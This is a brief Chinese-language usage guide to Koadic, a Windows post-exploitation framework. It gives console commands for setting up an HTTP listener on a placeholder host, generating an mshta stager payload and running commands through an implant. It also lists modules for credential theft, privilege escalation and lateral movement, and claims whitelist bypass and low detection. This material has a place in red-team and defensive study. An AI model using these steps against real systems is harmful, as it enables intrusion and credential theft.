Koadic

Koadic

Koadic 是一款轻量级的 Windows 后渗透工具，基于 JScript/VBScript，无需 PowerShell 即可执行。

基础使用

启动 Koadic

./koadic

创建 Listener

use listener/http
set Host x.x.x.x
set Port 8080
run

生成 Payload

use stager/js/mshta
set Listener http
generate

执行命令

use implant/manage/exec_cmd
set Command "whoami"
run

功能特性

JScript/VBScript - 不依赖 PowerShell
轻量级 - 简单易用
多种 Stager - 支持多种初始访问方式
模块化 - 丰富的功能模块

主要模块

权限提升 - 本地提权
凭证窃取 - 密码提取
网络侦察 - 系统信息收集
横向移动 - 内网渗透

技术特点

基于 Windows 脚本宿主
绕过应用白名单
低检测率
适合老旧系统

参考资源

Koadic GitHub